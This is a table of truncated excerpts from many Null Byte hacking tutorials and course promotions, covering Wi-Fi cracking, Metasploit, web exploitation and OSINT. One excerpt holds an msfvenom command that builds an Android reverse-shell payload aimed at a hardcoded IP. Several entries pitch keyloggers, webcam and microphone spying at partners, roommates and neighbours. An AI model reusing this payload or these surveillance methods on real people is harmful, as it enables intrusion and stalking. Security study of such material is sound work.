title stringlengths 30 147 | content stringlengths 17 61.4k |
|---|---|
How to Execute Hidden Python Commands in a One-Line Stager « Null Byte :: WonderHowTo | A stager is a small piece of software that's typically used by malware to hide what's happening in the early stages of infection and to download a larger payload later.We're going to explore how it works by creating a single line that downloads and runs potentially infinite lines of Python. An attacker could use this t... |
How to Leverage a Directory Traversal Vulnerability into Code Execution « Null Byte :: WonderHowTo | Directory traversal, or path traversal, is an HTTP attack which allows attackers to access restricted directories by using the ../ characters to backtrack into files or directories outside the root folder. If a web app is vulnerable to this, an attacker can potentially access restricted files that contain info about al... |
How to Spy on Network Relationships with Airgraph-Ng « Null Byte :: WonderHowTo | What if you could easily visualize which access point every Wi-Fi device nearby is connected to in a matter of seconds? While programs likeAirodump-ngcan intercept this wireless information, making it easy for hackers to use and understand is another challenge. Fortunately, a tool called Airgraph-ng can visualize the r... |
Hack Like a Pro: How to Remotely Install a Keylogger onto Your Girlfriend's Computer « Null Byte :: WonderHowTo | Welcome back, my greenhorn hackers!Several of you have you have emailed me asking whether it's possible to install a keylogger on a victim's computer using Metasploit. The answer is a resounding "YES"!So, by popular request, in this guide I'll show you how to install a keylogger on your girlfriend's, boyfriend's, wife'... |
How to Flash Kali NetHunter on OnePlus and Nexus Devices (Most) As a Secondary ROM « Null Byte :: WonderHowTo | Hello there, 'Flashers'!Welcome to my 8th Post. This tutorial will explain how to flash Kali NetHunter on OnePlus (Tested) and Nexus Devices (Not Tested-Should work) as a secondary ROM, so that none of your personnel data/ROM gets affected.NetHunter?Refer to Ciuffy's Post,right herePre-Requisites:1) Device should be ro... |
Android for Hackers: How to Turn an Android Phone into a Hacking Device Without Root « Null Byte :: WonderHowTo | With just a few taps, anAndroidphone can be weaponized into a covert hacking device capable of running tools such asNmap,Nikto, andNetcat— all without rooting the device.UserLAnd, created byUserLAnd Technologies, is a completely free Android app that makes installing Linux distributions quick and effortless, without an... |
SSH the World: Mac, Linux, Windows, iDevices and Android. « Null Byte :: WonderHowTo | Probably SSH is not as clean and fast as other useful tools like netcat, but it has some features which are very useful, and when you'll need them, here's how to behave with that huge amount of computers all over your house.Probably, you already know what SSH means, but for those who don't:SSH stands for Secure Shell a... |
How to Scan Websites for Interesting Directories & Files with Gobuster « Null Byte :: WonderHowTo | One of the first steps in attacking aweb applicationis enumerating hidden directories and files. Doing so can often yield valuable information that makes it easier to execute a precise attack, leaving less room for errors and wasted time. There are many tools available to do this, but not all of them are created equall... |
Mac for Hackers: How to Install the Metasploit Framework « Null Byte :: WonderHowTo | Metasploitis an extremely popular pentesting tool capable of enumeration, exploitation, and injecting shell code, and is a part of almost every hacking toolkit. So there's no way I could leave this out of our series ongetting your Mac set up for hacking.Luckily for those of us who use Apple machines, the install proces... |
Hack Like a Pro: Linux Basics for the Aspiring Hacker, Part 21 (GRUB Bootloader) « Null Byte :: WonderHowTo | Welcome back, my aspiring hackers!Many of you have installedKali Linuxas a virtual machine (VM) using VMware or VirtualBox, while others have installed Kali (orBackTrack) in adual-boot system. The drawback to installing these hacking systems as a VM is that it then requires anexternal wireless adapter(your wireless ada... |
Hack Like a Pro: How to Use Maltego to Do Network Reconnaissance « Null Byte :: WonderHowTo | Welcome back, my greenhorn hackers!Before we attempt to exploit any target, it is wise to do properreconnaissance. Without doing reconnaissance, you will likely be wasting your time and energy as well as risking your freedom. In previous guides, I have demonstrated multiple ways to perform reconnaissance including pass... |
Hack Like a Pro: Digital Forensics for the Aspiring Hacker, Part 6 (Using IDA Pro) « Null Byte :: WonderHowTo | Welcome back, my greenhorn hackers!Digital forensicsand hacking are complementary disciplines. The better you are at digital forensics, the better hacker you are, and the better hacker you are, the better you are digital forensics. Unfortunately, few people in either profession cross these discipline lines.No tool embo... |
Tor vs. I2P: The Great Onion Debate « Null Byte :: WonderHowTo | In my recentDarknet series, I attempted to connect the dots on the Deep Web. I covered the two largest anonymity networks on the Internet today,TorandI2P. While my initial four articles were meant as an introduction, I ended up receiving a lot of interesting comments and messages asking the technical differences betwee... |
Social Engineering, Part 1: Scoring a Free Cell Phone « Null Byte :: WonderHowTo | ThisNull Byteis the first part in a mini-series on the art ofSocial Engineering. I will be teaching you how to effectively defend yourself against it.What is Social Engineering?Social Engineeringis the art of hacking humans. It's when a person is manipulated into doing something that they do not realize, or wouldn't no... |
Hack Like a Pro: Getting Started with BackTrack, Your New Hacking System « Null Byte :: WonderHowTo | Welcome back, my fledgling hackers!In one of my recent articles, I showed you how toinstall BackTrack as a dual boot systemon a Windows computer. In this tutorial, I will walk you through BackTrack, giving you a tour of the most salient features for the hacker-to-be.NOTE: BackTrack Is No Longer Supported; Switch to Kal... |
How to Become an Elite Hacker Part 4: Hacking a Website. [Part 1] « Null Byte :: WonderHowTo | Welcome back my fellow army of hackers! Today we'll be hacking a website. Hacking is technically not the right word used here. It should be defacing! So we are going to deface a website...What's Defacing?Website defacement is an attack on a website that changes the visual appearance of the website. For example: you've ... |
How to Beat LFI Restrictions with Advanced Techniques « Null Byte :: WonderHowTo | One of the most common web application vulnerabilities is LFI, which allows unauthorized access to sensitive files on the server. Such a common weakness is often safeguarded against, and low-hanging fruit can be defended quite easily. But there are always creative ways to get around these defenses, and we'll be looking... |
How to Perform Network-Based Attacks with an SBC Implant « Null Byte :: WonderHowTo | With a tiny computer, hackers can see every website you visit, exploit services on the network, and break into your Wi-Fi router's gateway to manipulate sensitive settings. These attacks can be performed from anywhere once the attacker's computer has been connected to the router via a network implant.TheOrange Pi Zeroa... |
Android for Hackers: How to Scan Websites for Vulnerabilities Using an Android Phone Without Root « Null Byte :: WonderHowTo | Auditing websites and discovering vulnerabilities can be a challenge. With RapidScan and UserLAnd combined, anyone with an unrooted Android phone can start hacking websites with a few simple commands.RapidScandoes an excellent job of automating the deployment of vulnerability scanners and website auditing software. It ... |
Hack Like a Pro: How to Hack into Your Suspicious, Creepy Neighbor's Computer & Spy on Him « Null Byte :: WonderHowTo | Welcome back, my neophyte hackers!Have you ever had a neighbor that you're certain is up to no good? Maybe you've seen him moving packages in and out at all hours of the night? Maybe you've seen people go into his home and never come out? He seems like a creep and sometimes you hear strange sounds coming from his home?... |
Stay Fully in Sync with Your Remote Team Using TimeSync Pro « Null Byte :: WonderHowTo | If you've been working from home a bit more often than usual lately, you're far from alone. Despite some optimistic predictions that things would have returned to normal right now, social distancing guidelines have forced most offices to shut their doors, and it's looking like this is going to be the new normal for the... |
How to Hack a Radio to Pick Up Different Frequencies - Including Law Enforcement & More « Null Byte :: WonderHowTo | Hardware hacks are something I feel we don't get enough of atNull Byte, so today I figured I would introduce a fun one. I've always been a curious hardware hacker. Taking things apart and learning how their internals work has always been a part of my nature. Quite some years ago, my father showed me a really cool trick... |
This Extensive Python Training Is Under $40 Today « Null Byte :: WonderHowTo | Choosing which programming language to learn next can seem like a nearly impossible task, regardless of whether you're a novice developer or a seasoned coding pro with years of experience creating apps and websites. But if you haven't already learned Python, look no further.We've alreadyestablishedwhy Python is an exce... |
SQL Injection 101: Advanced Techniques for Maximum Exploitation « Null Byte :: WonderHowTo | ForSQL injection, the next step afterperforming reconnaissance and gathering informationabout a database is launching an attack. But something seems off .. in the real world, it's usually not quite as simple as passing in a few fragments of SQL code to an input field and seeing all that glorious data displayed right in... |
Hacking macOS: How to Hack a MacBook with One Ruby Command « Null Byte :: WonderHowTo | With just one line ofRubycode embedded into a fake PDF, a hacker can remotely control any Mac computer from anywhere in the world. Creating the command is the easy part, but getting the target to open the code is where a hacker will need to get creative.Ruby is just one way to backdoor into a computer running macOS (pr... |
Hack Like a Pro: How to Hack Web Apps, Part 4 (Hacking Form Authentication with Burp Suite) « Null Byte :: WonderHowTo | Welcome back, my tenderfoot hackers!In this series, we are exploring the myriad of ways to hack web applications. As you know, web applications are those apps that run the websites of everything from your next door neighbor, to theall-powerful financial institutionsthat run the world. Each of these applications is vuln... |
Know Your Rights: How to Escape Unlawful Stops and Police Searches with Social Engineering « Null Byte :: WonderHowTo | Law enforcement can make a lot of folks cringe. Too often do we hear on the news, and even experience in our own lives, the unjust way that an unacceptable portion of law enforcement treat the very citizens they are supposed to protect. People's rights are violate each and every day by law enforcement, simply because t... |
Tactical Nmap for Beginner Network Reconnaissance « Null Byte :: WonderHowTo | When it comes to attacking devices on a network, you can't hit what you can't see. Nmap gives you the ability to explore any devices connected to a network, finding information like the operating system a device is running and which applications are listening on open ports. This information lets a hacker design an atta... |
Hack Like a Pro: Capturing Zero-Day Exploits in the Wild with a Dionaea Honeypot, Part 2 (Configuration) « Null Byte :: WonderHowTo | Welcome back, my rookie hackers!The Golden Fleece of hackers is to develop a zero-day exploit, an exploit that has not been seen by antivirus (AV) software or and intrusion detection system (IDS). A zero-day exploit is capable of skating right past these defenses as they do not contain a signature or another way of det... |
How to Install & Use the Ultra-Secure Operating System OpenBSD in VirtualBox « Null Byte :: WonderHowTo | OpenBSDimplements security in its development in a way that no other operating system on the planet does. Learning to use the Unix-like operating system can help a hacker understand secure development, create better servers, and improve their understanding of the BSD operating system. UsingVirtualBox, the OS can be ins... |
How to Conceal a USB Flash Drive in Everyday Items « Null Byte :: WonderHowTo | Technology in computers these days are very favorable to the semi-knowledgeable hacker. We haveTORfor anonymity online, we haveSSDsto protect and securely delete our data—we can even boot an OS from a thumb drive or SD card. With a little tunneling and MAC spoofing, a decent hacker can easily go undetected and even mak... |
How to Enable the New Native SSH Client on Windows 10 « Null Byte :: WonderHowTo | For years,PuTTyhas reigned supreme as the way to establish aSecure Shell (SSH)connection. However, those days are numbered with the addition of theOpenSSH serverand client in theWindows 10 Fall Creators Update, which brings Windows up to par with macOS and Linux's ability to use SSH natively.As a beta implementation of... |
How to Hack Forum Accounts with Password-Stealing Pictures « Null Byte :: WonderHowTo | The pictures we upload online are something we tend to think of as self-expression, but these very images can carry code to steal our passwords and data. Profile pictures, avatars, and image galleries are used all over the internet. While all images carry digital picture data — and many also carry metadata regarding ca... |
How to Fuzz Parameters, Directories & More with Ffuf « Null Byte :: WonderHowTo | The art of fuzzing is a vital skill for any penetration tester or hacker to possess. The faster you fuzz, and the more efficiently you are at doing it, the closer you come to achieving your goal, whether that means finding a valid bug or discovering an initial attack vector. A tool called ffuf comes in handy to help sp... |
How to Extract Windows Usernames, Passwords, Wi-Fi Keys & Other User Credentials with LaZagne « Null Byte :: WonderHowTo | After exploiting a vulnerable target, scooping up a victim's credentials is a high priority for hackers, since most people reuse passwords. Those credentials can get hackers deeper into a network or other accounts, but digging through the system by hand to find them is difficult. A missed stored password could mean mis... |
Hack Like a Pro: How to Hack Web Apps, Part 1 (Getting Started) « Null Byte :: WonderHowTo | Welcome back, my budding hackers!With this article, I am initiating a new series thatsomany of you have been asking for:Hacking Web Applications.In previous tutorials, we have touched on some of the techniques and tools for web app hacking. We looked atweb app vulnerability testing,website cloning,web app footprinting,... |
This LastPass Phishing Hack Can Steal All Your Passwords—Here's How to Prevent It « Null Byte :: WonderHowTo | If you want to keep your online world secure, your best bet is to have a different password for every site and service that you use, and to make sure each of the passwords are comprised of random characters instead of familiar words or numbers. But this obviously creates a problem—how exactly are we supposed to remembe... |
Hack Like a Pro: The Ultimate Command Cheat Sheet for Metasploit's Meterpreter « Null Byte :: WonderHowTo | I've donenumerous tutorialsin Null Byte demonstrating the power ofMetasploit's meterpreter. With the meterpreter on the target system, you have nearly total command of the victim.As a result, several of you have asked me for a complete list of commands available for the meterpreter because there doesn't seem to be a co... |
Master Excel with This Certification Bundle « Null Byte :: WonderHowTo | Microsoft Excel is one of the most useful tools you can bring into your professional life. However, as useful as Excel is, it can also be difficult to learn on your own. TheAll-In-One Microsoft Excel Certification Training Bundleis an incredible tool that will take you from Excel beginner to Master for $33.99, on sale ... |
How to Set Up a Headless Raspberry Pi Hacking Platform Running Kali Linux « Null Byte :: WonderHowTo | TheRaspberry Piis a credit card-sized computer that can crack Wi-Fi, clone key cards, break into laptops, and even clone an existing Wi-Fi network to trick users into connecting to the Pi instead. It can jam Wi-Fi for blocks, track cell phones, listen in on police scanners, broadcast an FM radio signal, andapparently e... |
How to Scan, Fake & Attack Wi-Fi Networks with the ESP8266-Based WiFi Deauther « Null Byte :: WonderHowTo | The price ofhacking Wi-Fihas fallen dramatically, andlow-cost microcontrollersare increasingly being turned into cheap yet powerful hacking tools. One of the most popular is theESP8266, an Arduino-programmable chip on which theWi-Fi Deautherproject is based. On this inexpensive board, a hacker can create fake networks,... |
How to Hack Wi-Fi: Selecting a Good Wi-Fi Hacking Strategy « Null Byte :: WonderHowTo | Welcome back, my rookie hackers!So many readers come to Null Byte to learnhow to hack Wi-Fi networks(this is the most popular hacking area on Null Byte) that I thought I should write a "how-to" on selecting a good Wi-Fi hacking strategy.Many beginners come here looking to hack Wi-Fi, but have no idea where or how to st... |
The Hacks of Mr. Robot: How to Hack Bluetooth « Null Byte :: WonderHowTo | Welcome back, my novice hackers!Episode 6ofMr. Robothas come and gone and, as usual, it did not disappoint. Once again, our hero, Elliot, has used his extraordinary intellect and hacking skills to awe and inspire us.In this episode, Elliot is being blackmailed by the ruthless and unrelenting drug dealer, Vera, to hack ... |
Top 10 Exploit Databases for Finding Vulnerabilities « Null Byte :: WonderHowTo | Hundreds ofWindows 10,macOS, andLinuxvulnerabilities are disclosed every single week, many of which elude mainstream attention. Most users aren't even aware that newly found exploits and vulnerabilities exist, nor that CVEs can be located by anyone in just a few clicks from a selection of websites online.What Is a CVE?... |
This VPN Will Give You a Lifetime of Security for Just $18 « Null Byte :: WonderHowTo | With everything the last year has thrown at us, the odds are good that you've had to start working from home, complete with all-new challenges both for you and the technology you use.In 2020,88% of the organizations worldwidemade it mandatory for employees to start working from home to reduce the risk of exposure to CO... |
How to Modify the USB Rubber Ducky with Custom Firmware « Null Byte :: WonderHowTo | The USB Rubber Ducky comes with two software components, the payload script to be deployed and the firmware which controls how the Ducky behaves and what kind of device it pretends to be. This firmware can be reflashed to allow for custom Ducky behaviors, such as mounting USB mass storage to copy files from any system ... |
Hacking Android: How to Create a Lab for Android Penetration Testing « Null Byte :: WonderHowTo | As Androidbug bounty huntersand penetration testers, we need a properly configured environment to work in when testing exploits and looking for vulnerabilities. This could mean a virtual Android operating system or a dedicated network for capturing requests and performing man-in-the-middle attacks.There are many ways t... |
How to Intercept Images from a Security Camera Using Wireshark « Null Byte :: WonderHowTo | It's common for IoT devices likeWi-Fi security camerasto host a website for controlling or configuring the camera that uses HTTP instead of the more secure HTTPS. This means anyone with the network password can see traffic to and from the camera, allowing a hacker to intercept security camera footage if anyone is watch... |
Start Learning How to Code in Just a Week « Null Byte :: WonderHowTo | If you've been thinking about changing careers and you have just a little bit of time,The Ultimate 2021 Web Developer & Designer Super Bundlemay be just what you need. This is also the perfect time to get it because it's on sale for $34.99, which is 98% off the regular price of $1,886. You'll get 14 courses that offer ... |
Hack Like a Pro — Page 2 of 2 « Null Byte :: WonderHowTo | No content found. |
How to Perform Keystroke Injection Attacks Over Wi-Fi with Your Smartphone « Null Byte :: WonderHowTo | With just two microcontrollers soldered together, you can inject keystrokes into a computer from a smartphone. After building and programming the device, you plug it into a desktop or laptop, access it over a smartphone, and inject keystrokes as you would with aUSB Rubber Ducky.However, with a Rubber Ducky, you need to... |
Subterfuge: MITM Automated Suite That Looks Just Lame. « Null Byte :: WonderHowTo | Remember when MITMing people to pentest webapps and log-ins you had to fire Ettercap,Arpspoof, SSLstrip, then look for credentials in the captured packets?No more thanks to (or fault of?) "Subterfuge".Surprisingly, there's nothing about Subterfuge here on Null Byte (is it?), so I decided to share this awesome tool pres... |
How to VPN Your IoT & Media Devices with a Raspberry Pi PIA Routertraffic « Null Byte :: WonderHowTo | Virtual private networks, or VPNs, are popular for helping you stay anonymous online by changing your IP address, encrypting traffic, and hiding your location. However, common IoT devices, media players, and smart TVs are hard to connect to a VPN, but we have a solution: Turn a Raspberry Pi into a router running throug... |
How to Use the Cowrie SSH Honeypot to Catch Attackers on Your Network « Null Byte :: WonderHowTo | The internet is constantly under siege by bots searching for vulnerabilities to attack and exploit. While conventional wisdom is to prevent these attacks, there are ways to deliberately lure hackers into a trap in order to spy on them, study their behavior, and capture samples of malware. In this tutorial, we'll be cre... |
Hack Like a Pro: Linux Basics for the Aspiring Hacker, Part 8 (Managing Processes) « Null Byte :: WonderHowTo | Welcome back, my novice hackers!In my continuing effort to develop your Linux skills, I now offer you this eighth in my series forLinux Basics for the Aspiring Hacker. In this tutorial, we'll look at system processes and how to manage them.In Linux, a process is a program running in memory. Typically, your computer is ... |
Hack Like a Pro: How to Find Website Vulnerabilities Using Wikto « Null Byte :: WonderHowTo | Welcome back, my hacker novitiates!When we are trying to find vulnerabilities in a website to attack, we need a solid web server vulnerability scanner. Internet-facing web apps can open enormous opportunities for us as they are often riven with vulnerabilities and can often offer an entire point to the internal network... |
TypoGuy Explaining Anonymity: Choosing a Good VPN « Null Byte :: WonderHowTo | You want to become anonymous, and dont want your IP to be logged on websites? Well read along here.Continuing This Series:I am continuing this series for those of you whom didnt know I had one of these going.Follow up on this series by searching in the search byYour Real IdentityWho is AnonymousA Hackers MindsetAnd now... |
Hack Like a Pro: How to Remotely Record & Listen to the Microphone on Anyone's Computer « Null Byte :: WonderHowTo | Welcome back, my tenderfoot hackers!So many of you responded positively to my post aboutusing the keylogger, as well as my post regardingturning on the webcam, that I decided that you might enjoy another similar hack. In this article, we will enable the audio recording capability on the remote system of your roommate.O... |
Gathering Sensitive Information: Using Advanced Search Queries « Null Byte :: WonderHowTo | continuing this series, I will now go in-depth on using advanced search queries.What Is Search Queries Again?When you type something into Google, or whatever you are using, you for obvious reasons, dont get all the results on your search. Because that would simply be way too much data for your computer to handle.hence:... |
Hack Like a Pro: Digital Forensics for the Aspiring Hacker, Part 5 (Windows Registry Forensics) « Null Byte :: WonderHowTo | Welcome back, my aspiring hackers!As I mentioned in earlier posts, the best hackers (or at least those not behind bars) have a keen understanding ofdigital forensics. If I am tasked to intrude upon an enemy's file server to retrieve war plans, such as inthis tutorial, it is essential to my country's (and my own) well-b... |
How to Hack Open Hotel, Airplane & Coffee Shop Wi-Fi with MAC Address Spoofing « Null Byte :: WonderHowTo | Afterfinding and monitoringnearby wireless access points and devices connected to them, hackers can use this information to bypass some types of security, like the kind used for Wi-Fi hotspots in coffee shops, hotels, and in flights high above the ground. By swapping their MAC address for that of someone already connec... |
Hack Like a Pro: Linux Basics for the Aspiring Hacker, Part 1 (Getting Started) « Null Byte :: WonderHowTo | Welcome back, my hacker trainees!A number of you have written me regarding which operating system is best for hacking. I'll start by saying that nearly every professional and expert hacker uses Linux or Unix. Although some hacks can be done with Windows and Mac OS, nearly all of the hacking tools are developed specific... |
How to Hack Wi-Fi: Disabling Security Cameras on Any Wireless Network with Aireplay-Ng « Null Byte :: WonderHowTo | Electronic warfare tactics work by jamming, disrupting, or disabling the technology a target uses to perform a critical function, and IoT devices are especially vulnerable to attacks. Wireless security cameras like theNest Camare frequently used to secure critical locations, but a hacker can surgically disable a webcam... |
How to Add Proxies to Your ProxyChains Config File the Lazy Way ;) « Null Byte :: WonderHowTo | Hello fellow gray hat hackers, I wrote a program in python that helps me to fill up my proxychains.conf file, so I don't have to manually enter in the proxies. I figured I will give a little how-to of how I did it and maybe I could help some of you(hackers) out there to stay anonymous.What Is Proxychains?According toth... |
Hijacking Cookie Sessions « Null Byte :: WonderHowTo | Let's say that we want to see what someone is doing on their computer? In this tutorial, we'll be hijacking cookie sessions to do just that!Step 1: Preparing KaliIn order to do this, we need three tools:Ettercap (duh)HamsterFerretFerret is a nice little tool that runs with Hamster. It grabs session cookies that travel ... |
Hack Like a Pro: How to Conduct OS Fingerprinting with Xprobe2 « Null Byte :: WonderHowTo | Welcome back, my novice hackers!I've written a couple of articles onreconnaissanceand its importance, and as I've said before, a good hacker will spend 3 to 4 more times doing reconnaissance than actually exploiting the system. If your recon isn't good, you'll likely fail, or worse—end up serving time and becoming Bubb... |
How to Safely Log In to Your SSH Account Without a Password « Null Byte :: WonderHowTo | SSH is amazing, and we praise its existence onNull Byteformanyreasons. Notably, it allows us to reroute our traffic through encrypted ports on our local host to be sent to its destination when on the go. You can even control your home computers remotely over a secure and encrypted connection. This is handy for amultitu... |
How to Load Kali Linux on the Raspberry Pi 4 for the Ultimate Miniature Hacking Station « Null Byte :: WonderHowTo | In 2019, the Raspberry Pi 4 was released with specs including either 1 GB, 2 GB, or 4 GB of memory, a Broadcom BCM2711B0 quad-core A72 SoC, a USB Type-C power supply, and dual Micro-HDMI outputs. Performance and hardware changes aside, the Pi 4 Model B runs Kali Linux just as well, if not better, than its predecessors.... |
Hack Like a Pro: How to Use PowerSploit, Part 1 (Evading Antivirus Software) « Null Byte :: WonderHowTo | Welcome back, my greenhorn hackers!A few years back, Microsoft implicitly recognized the superiority of the Linux terminal over the GUI-based operating system by developing PowerShell. Since Windows 7, every Windows operating system has had PowerShell installed by default, and they even made PowerShell capable of runni... |
How to Crack SSH Private Key Passwords with John the Ripper « Null Byte :: WonderHowTo | Secure Shell is one of the most common network protocols, typically used to manage remote machines through an encrypted connection. However, SSH is prone to password brute-forcing. Key-based authentication is much more secure, and private keys can even be encrypted for additional security. But eventhatisn't bulletproof... |
How to Become an Elite Hacker, Part 1: Getting Started « Null Byte :: WonderHowTo | Who am I?First let me introduce myself. I am Th3skYf0x, an -well lets call itexperienced- hacker and i recently found this site and right after that i found this Null Byte "world" soo i thought... Why not teaching instead of doing nothing with my knowledge. Let me get one thing clear, i am not the best hacker in the wo... |
How to Use PowerShell Empire: Getting Started with Post-Exploitation of Windows Hosts « Null Byte :: WonderHowTo | PowerShell Empireis a post-exploitation framework for computers and servers running Microsoft Windows, Windows Server operating systems, or both. In these tutorials, we will be exploring everything from how to install Powershell Empire to how to snoop around a target's computer without the antivirus software knowing ab... |
How to Change a Phone's Coordinates by Spoofing Wi-Fi Geolocation Hotspots « Null Byte :: WonderHowTo | In many urban areas, GPS doesn't work well. Buildings reflect GPS signals on themselves to create a confusing mess for phones to sort out. As a result, most modern devices determine their location using a blend of techniques, including nearby Wi-Fi networks. By using SkyLift to create fake networks known to be in other... |
Hack Like a Pro: Scripting for the Aspiring Hacker, Part 2 (Conditional Statements) « Null Byte :: WonderHowTo | Welcome back, my greenhorn hackers!I recently began aseries on scriptingand have received such positive feedback that I'm going to keep this series going. As I've said before, to graduate from the script kiddie to the pro hacker, you'll need to have some scripting skills. The better you are at scripting, the more advan... |
Become a Big Data Expert with This 10-Course Bundle « Null Byte :: WonderHowTo | In today's data-driven world, being well-versed in Big Data and analytics can help land an exciting and high-paying career. Whether you're interested in working for a major tech company or pursuing freelance work in development, you need to have a thorough understanding of the latest and greatest platforms in analytics... |
Video: How to Crack Weak Wi-Fi Passwords in Seconds with Airgeddon on Parrot OS « Null Byte :: WonderHowTo | A weak password is one that is short, common, or easy to guess. Equally bad are secure but reused passwords that have been lost by negligent third-party companies like Equifax and Yahoo. Today, we will useAirgeddon, a wireless auditing framework, to show how anyone can crack bad passwords for WPA and WPA2 wireless netw... |
How to Use Burp & FoxyProxy to Easily Switch Between Proxy Settings « Null Byte :: WonderHowTo | One of the best ways todig into a websiteand look for vulnerabilities is by using aproxy. By routing traffic through a proxy like Burp Suite, you can discover hidden flaws quickly, but sometimes it's a pain to turn it on and off manually. Luckily, there is abrowseradd-on calledFoxyProxythat automates this process with ... |
How to Take Pictures Through a Victim's Webcam with BeEF « Null Byte :: WonderHowTo | Recently, I've been experimenting withBeEF (Browser Exploitation Framework), and to say the least, I'm hooked. When using BeEF, you must "hook" the victims browser. This means that you must run the script provided by BeEF, which is titled "hook.js", in the victims browser. Once you've done that, you can run commands ag... |
How to Hack WPA2 Wi-Fi Passwords Using Jedi Mind Tricks (& USB Dead Drops) « Null Byte :: WonderHowTo | The latest Star Wars movie,Solo: A Star Wars Story, hasgrossed almost $350 million worldwideduring its first month in theaters. This is a good opportunity to discuss how hackers can use media hype (in this case, Hollywood movie hype) to disarm an unsuspecting Windows user into inserting anevil USB stickinto their compu... |
How to Install a Persistant Backdoor in Windows Using Netcat « Null Byte :: WonderHowTo | Imagine this scenario: You exploited a system using metasploit and you want to install a backdoor. You have a few options;Use the meterpreter persistence command.Use the meterpreter metsvc command.Use netcat to listen on a port continuously.You have already tried option 1 and 2 and they failed... You have one more chan... |
How to Use Photon Scanner to Scrape Web OSINT Data « Null Byte :: WonderHowTo | Gathering information on an online target can be a time-consuming activity, especially if you only need specific pieces of information about a target with a lot of subdomains. We can use a web crawler designed for OSINT called Photon to do the heavy lifting, sifting through URLs on our behalf to retrieve information of... |
The Essential Skills to Becoming a Master Hacker « Null Byte :: WonderHowTo | Many of my aspiring hackers have written to me asking the same thing. "What skills do I need to be a good hacker?"As the hacker is among the most skilled information technology disciplines, it requires a wide knowledge of IT technologies and techniques. To truly be a great hacker, one must master many skills. Don't be ... |
How to Exploit Routers on an Unrooted Android Phone « Null Byte :: WonderHowTo | RouterSploit is a powerful exploit framework similar toMetasploit, working to quickly identify and exploit common vulnerabilities in routers. And guess what. It can be run on most Android devices.I initiallycovered RouterSploit on Kali Linux and macOS (OS X), but this tutorial will walk you through setting up RouterSpl... |
Hacking Windows 10: How to Hack uTorrent Clients & Backdoor the Operating System « Null Byte :: WonderHowTo | Compromised uTorrent clients can be abused to download a malicious torrent file. The malicious file is designed to embed a persistent backdoor and execute when Windows 10 reboots, granting the attacker remote access to the operating system at will.Torrent clients likeuTorrentandTransmissionhave built-in features that a... |
Hack Networks & Devices Right from Your Wrist with the Wi-Fi Deauther Watch « Null Byte :: WonderHowTo | The Deauther Watch by Travis Lin is the physical manifestation of theWi-Fi Deautherproject by Spacehuhn, and it's designed to let you operate the Deauther project right from your wrist without needing a computer. That's pretty cool if you want to do all the interesting things that the Wi-Fi Deauther can do without plug... |
How to Probe Websites for Vulnerabilities More Easily with the TIDoS Framework « Null Byte :: WonderHowTo | Websites and web applications power the internet as we know it, representing a juicy target for any hacker or red team. TIDoS is a framework of modules brought together for their usefulness in hacking web apps, organized into a common sense workflow. With an impressive array of active and passive OSINT modules, TIDoS h... |
How to Check if Your Wireless Network Adapter Supports Monitor Mode & Packet Injection « Null Byte :: WonderHowTo | Tohack a Wi-Fi network, you needyour wireless cardto support monitor mode and packet injection. Not all wireless cards can do this, but you can quickly test one you already own for compatibility, and you can verify that the chipset inside an adapter you're thinking of purchasing will work for Wi-Fi hacking.Wireless car... |
Hack Like a Pro: How to Remotely Install an Auto-Reconnecting Persistent Back Door on Someone's PC « Null Byte :: WonderHowTo | Welcome back, my hacker wannabees!Most of my recent posts have addressed using Metasploit's Meterpreter and what we can do once we have embedded it on the victim's system. This includes remotely installinga keylogger, enablingthe webcam, enablingthe microphone and recording, disablingthe antivirus software, among many ... |
Hack Like a Pro « Null Byte :: WonderHowTo | No content found. |
How to Hunt Down Social Media Accounts by Usernames with Sherlock « Null Byte :: WonderHowTo | When researching a person using open source intelligence, the goal is to find clues that tie information about a target into a bigger picture. Screen names are perfect for this because they are unique and link data together, as people often reuse them in accounts across the internet. With Sherlock, we can instantly hun... |
Hack Android Using Kali (UPDATED and FAQ) « Null Byte :: WonderHowTo | Hello My Fellow Hackerzz.. This is my first How-to and i'll be updating the "Hacking Android Using Kali" to msfvenom and some FAQ about known problems from comments. So Here we GO!!For Anything With a *, Please See The FAQ for More Info..MSFVenommsfvenom -p android/meterpreter/reverse_tcp LHOST=186.57.28.44 LPORT=4895 ... |
How to Use SSH Local Port Forwarding to Pivot into Restricted Networks « Null Byte :: WonderHowTo | SSH is a powerful tool with more uses than simply logging into a server. This protocol, which stands for Secure Shell, provides X11 forwarding, port forwarding, secure file transfer, and more. Using SSH port forwarding on a compromised host with access to a restricted network can allow an attacker to access hosts withi... |
This 5-Course Data Analytics Bundle Is Just $49 Today « Null Byte :: WonderHowTo | Few things are more important than being well-versed in data analytics and interpretation when it comes to succeeding in today's increasingly data-driven world. As a data scientist, these skills are the key to a high-paying career. For hackers, there's no better way to defeat the enemy than to become the enemy.Whether ... |
Hack Like a Pro: How to Crack Online Web Form Passwords with THC-Hydra & Burp Suite « Null Byte :: WonderHowTo | Welcome back, my hacker novitiates!Inan earlier tutorial, I had introduced you to two essential tools for cracking online passwords—Tamper Data and THC-Hydra. In that guide, I promised to follow up with another tutorial on how to use THC-Hydra against web forms, so here we go. Although you can use Tamper Data for this ... |
How to Exploit Java Remote Method Invocation to Get Root « Null Byte :: WonderHowTo | In the world of technology, there's often a trade-off between convenience and security. The Java Remote Method Invocation is a system where that trade-off is all too real. The ability for a program written inJavato communicate with another program remotely can greatly extend the usability of an app, but it can also ope... |
Use Internet Explorer? Install the Latest Version to Avoid the Newest Zero-Day Exploit « Null Byte :: WonderHowTo | If you're one of the people who make up thenearly 24%of Internet users on Internet Explorer, now is a good time to click on 'Check for updates.' Researchers have found yet anotherMetasploit Zero-Day exploitthat leaves IE 7, 8, and 9 vulnerable for Windows users.Image viarapid7.comBrought to us by the same group as theJ... |
Gathering Sensitive Information: How a Hacker Doesn't Get DoXed « Null Byte :: WonderHowTo | before I move on to more exciting areas in this series, I want to also point out some things to protect your information & how to not get DoXed.Where Is Your Information?In order to protect your information, you first need to understand where it is. And maybe even why it's there. So let's take a look at some of your ba... |
How to Automate Wi-Fi Hacking with Wifite2 « Null Byte :: WonderHowTo | There are many ways to attack a Wi-Fi network. The type of encryption, manufacturer settings, and the number of clients connected all dictate how easy a target is to attack and what method would work best. Wifite2 is a powerful tool that automates Wi-Fi hacking, allowing you to select targets in range and let the scrip... |
